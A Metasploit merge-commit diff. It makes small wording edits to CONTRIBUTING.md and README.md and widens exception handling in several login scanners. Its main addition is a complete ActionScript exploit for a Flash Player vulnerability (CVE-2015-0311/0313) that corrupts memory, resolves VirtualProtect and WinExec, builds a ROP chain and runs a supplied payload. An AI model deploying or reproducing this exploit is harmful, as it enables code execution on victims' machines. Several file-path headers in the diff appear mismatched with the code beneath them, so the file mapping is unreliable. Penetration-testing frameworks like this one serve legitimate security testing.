Merge branch 'upstream/master'

Author: OJ

CONTRIBUTING.md

@@ -4,8 +4,8 @@ Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!
 
 Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
-Please try to be as specific as you can about your problem, include steps
-to reproduce (cut and paste from your console output if it's helpful), and
+Please try to be as specific as you can about your problem; include steps
+to reproduce (cut and paste from your console output if it's helpful) and
 what you were expecting to happen.
 
 Are you about to report a security vulnerability in Metasploit itself?
@@ -18,7 +18,7 @@ Metasploit module? If so, read on...
 
 # Contributing to Metasploit
 
-What you see here in CONTRIBUTING.md is a bullet-point list of the do's
+What you see here in CONTRIBUTING.md is a bullet point list of the do's
 and don'ts of how to make sure *your* valuable contributions actually
 make it into Metasploit's master branch.
 
@@ -27,7 +27,7 @@ closed. Sorry!
 
 This is intended to be a **short** list. The [wiki] is much more
 exhaustive and reveals many mysteries. If you read nothing else, take a
-look at the standard [development environment setup] guide,
+look at the standard [development environment setup] guide
 and Metasploit's [Common Coding Mistakes].
 
 ## Code Contributions
@@ -52,7 +52,7 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 #### New Modules
 
 * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up.
-  - Even better would be to set up `msftidy.rb` as a [pre-commit hook].
+  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
 
@@ -80,19 +80,19 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 * **Do** report vulnerabilities in Rapid7 software directly to [email protected].
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
-* **Don't** file duplicate reports - search for your bug before filing a new report.
+* **Don't** file duplicate reports; search for your bug before filing a new report.
 
 If you need some more guidance, talk to the main body of open
-source contributors over on the [Freenode IRC channel]
-or e-mail us at [metasploit-hackers] mailing list.
+source contributors over on the [Freenode IRC channel],
+or e-mail us at the [metasploit-hackers] mailing list.
 
 Also, **thank you** for taking the few moments to read this far! You're
 already way ahead of the curve, so keep it up!
 
 [Issue Tracker]:http://r-7.co/MSF-BUGv1
 [PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
 [wiki]:https://github.com/rapid7/metasploit-framework/wiki
-[scripts]: https://github.com/rapid7/metasploit-framework/tree/master/scripts
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [development environment setup]:http://r-7.co/MSF-DEV
 [Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
@@ -104,10 +104,10 @@ already way ahead of the curve, so keep it up!
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
-[API]:https://rapid7.github.io/metasploit-framework/api/
-[RSpec]:http://rspec.info/
-[Better Specs]:http://betterspecs.org/
-[YARD]:http://yardoc.org/
+[API]:https://rapid7.github.io/metasploit-framework/api
+[RSpec]:http://rspec.info
+[Better Specs]:http://betterspecs.org
+[YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
 [metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

README.md

@@ -3,7 +3,7 @@ Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.pn
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.
 
-The latest version of this software is available from https://metasploit.com/
+The latest version of this software is available from: https://metasploit.com
 
 Bug tracking and development information can be found at:
  https://github.com/rapid7/metasploit-framework
@@ -20,8 +20,8 @@ Questions and suggestions can be sent to:
 Installing
 --
 
-Generally, you should use [the free installer](https://www.metasploit.com/download)
-which contains all dependencies and will get you up and running with a
+Generally, you should use [the free installer](https://www.metasploit.com/download),
+which contains all of the dependencies and will get you up and running with a
 few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.
 
@@ -34,10 +34,10 @@ resources](https://metasploit.github.io), or the [wiki].
 
 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
-walk you through the whole process starting from installing all the
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more info, see
+pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
 
 

data/exploits/CVE-2015-0313/msf.swf

@@ -3,6 +3,7 @@
 // 2. Be support to support 16.0 as target-player (flex-config.xml).
 // 3. Download the Flex SDK (4.6)
 // 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
 // 5. Build with: mxmlc -o msf.swf Main.as
 
 // Original code by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/

external/source/exploits/CVE-2015-0311/Main.as

@@ -0,0 +1,207 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Be support to support 16.0 as target-player (flex-config.xml).
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 5. Build with: mxmlc -o msf.swf Main.as
+
+// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
+// Modified to be used from msf
+package
+{
+import flash.display.Sprite
+import flash.display.LoaderInfo
+import flash.events.Event
+import flash.utils.ByteArray
+import flash.system.Worker
+import flash.system.WorkerDomain
+import flash.system.MessageChannel
+import flash.system.ApplicationDomain
+import avm2.intrinsics.memory.casi32
+import mx.utils.Base64Decoder
+
+public class Main extends Sprite
+{
+    private var ov:Vector.<Object> = new Vector.<Object>(25600)
+    private var uv:Vector.<uint> = new Vector.<uint>
+    private var ba:ByteArray = new ByteArray()
+    private var worker:Worker
+    private var mc:MessageChannel
+    private var b64:Base64Decoder = new Base64Decoder()
+    private var payload:String = ""
+
+    public function Main()
+    {
+        if (Worker.current.isPrimordial) mainThread()
+        else workerThread()
+    }
+
+    private function mainThread():void
+    {
+        b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+        payload = b64.toByteArray().toString()
+
+        ba.length = 0x1000
+        ba.shareable = true
+        for (var i:uint = 0; i < ov.length; i++) {
+            ov[i] = new Vector.<Object>(1014)
+            ov[i][0] = ba
+            ov[i][1] = this
+        }
+        for (i = 0; i < ov.length; i += 2) delete(ov[i])
+        worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
+        mc = worker.createMessageChannel(Worker.current)
+        mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
+        worker.setSharedProperty("mc", mc)
+        worker.setSharedProperty("ba", ba)
+        ApplicationDomain.currentDomain.domainMemory = ba
+        worker.start()
+    }
+
+    private function workerThread():void
+    {
+        var ba:ByteArray = Worker.current.getSharedProperty("ba")
+        var mc:MessageChannel = Worker.current.getSharedProperty("mc")
+        ba.clear()
+        ov[0] = new Vector.<uint>(1022)
+        mc.send("")
+        while (mc.messageAvailable);
+        ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
+        ba.length = 0x500000
+        var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000
+        var main:uint = ov[0][0x409] - 1
+        var vtable:uint = vector_read(main)
+        vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
+        vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
+        mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString())
+    }
+
+    private function onMessage(e:Event):void
+    {
+        casi32(0, 1022, 0xFFFFFFFF)
+        if (ba.length != 0xffffffff) mc.receive()
+        else {
+            ba.endian = "littleEndian"
+            var data:Array = (mc.receive() as String).split("/")
+            byte_write(parseInt(data[0]))
+            var buffer:uint = parseInt(data[1]) as uint
+            var main:uint = parseInt(data[2]) as uint
+            var vtable:uint = parseInt(data[3]) as uint
+            var flash:uint = base(vtable)
+            var ieshims:uint = module("winmm.dll", flash)
+            var kernel32:uint = module("kernel32.dll", ieshims)
+
+            var virtualprotect:uint = procedure("VirtualProtect", kernel32)
+            var winexec:uint = procedure("WinExec", kernel32)
+            var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
+
+            //CoE
+            byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
+            byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
+            byte_write(0, "\x89\x03", false) // mov [ebx], eax
+            byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            byte_write(buffer+0x200, payload);
+            byte_write(buffer + 0x20070, xchgeaxespret)
+            byte_write(buffer + 0x20000, xchgeaxesiret)
+            byte_write(0, virtualprotect)
+
+            // VirtualProtect
+            byte_write(0, winexec)
+            byte_write(0, buffer + 0x30000)
+            byte_write(0, 0x1000)
+            byte_write(0, 0x40)
+            byte_write(0, buffer + 0x100)
+
+            // WinExec
+            byte_write(0, buffer + 0x30000)
+            byte_write(0, buffer + 0x200)
+            byte_write(0)
+
+            byte_write(main, buffer + 0x20000)
+            toString()
+        }
+    }
+
+    private function vector_write(addr:uint, value:uint = 0):void
+    {
+        addr > ov[0][0] ? ov[0][(addr - uv[0]) / 4 - 2] = value : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1] = value
+    }
+
+    private function vector_read(addr:uint):uint
+    {
+        return addr > ov[0][0] ? ov[0][(addr - ov[0][0]) / 4 - 2] : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1]
+    }
+
+    private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
+    {
+        if (addr) ba.position = addr
+        if (value is String) {
+            for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+            if (zero) ba.writeByte(0)
+        } else ba.writeUnsignedInt(value)
+    }
+
+    private function byte_read(addr:uint, type:String = "dword"):uint
+    {
+        ba.position = addr
+        switch(type) {
+            case "dword":
+                return ba.readUnsignedInt()
+            case "word":
+                return ba.readUnsignedShort()
+            case "byte":
+                return ba.readUnsignedByte()
+        }
+        return 0
+    }
+
+    private function base(addr:uint):uint
+    {
+        addr &= 0xffff0000
+        while (true) {
+            if (byte_read(addr) == 0x00905a4d) return addr
+            addr -= 0x10000
+        }
+        return 0
+    }
+
+    private function module(name:String, addr:uint):uint
+    {
+        var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
+        while (true) {
+            var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
+            if (!entry) throw new Error("FAIL!");
+            ba.position = addr + entry
+            if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
+        }
+        return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
+    }
+
+    private function procedure(name:String, addr:uint):uint
+    {
+        var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
+        var numberOfNames:uint = byte_read(eat + 0x18)
+        var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
+        var addressOfNames:uint = addr + byte_read(eat + 0x20)
+        var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
+        for (var i:uint = 0; ; i++) {
+            var entry:uint = byte_read(addressOfNames + i * 4)
+            ba.position = addr + entry
+            if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
+        }
+        return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
+    }
+
+    private function gadget(gadget:String, hint:uint, addr:uint):uint
+    {
+        var find:uint = 0
+        var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
+        var value:uint = parseInt(gadget, 16)
+        for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
+        return addr + i
+    }
+}
+}

external/source/exploits/CVE-2015-0313/Main.as

@@ -29,7 +29,7 @@ def attempt_login(credential)
           begin
             status = try_login(credential)
             result_opts.merge!(status)
-          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
           end
 

lib/metasploit/framework/login_scanner/chef_webui.rb

@@ -83,7 +83,7 @@ def attempt_login(credential)
             else
               result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
             end
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
           ensure
             cli.close

lib/metasploit/framework/login_scanner/gitlab.rb

@@ -183,7 +183,7 @@ def attempt_login(credential)
               status = try_glassfish_3(credential)
               result_opts.merge!(status)
             end
-          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
           end
 

lib/metasploit/framework/login_scanner/glassfish.rb

@@ -231,7 +231,7 @@ def send_request(opts)
             cli.connect
             req = cli.request_cgi(opts)
             res = cli.send_recv(req)
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             raise Rex::ConnectionError, e.message
           ensure
             cli.close

lib/metasploit/framework/login_scanner/http.rb

@@ -50,7 +50,7 @@ def attempt_login(credential)
             else
               result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
             end
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
           end
           Result.new(result_opts)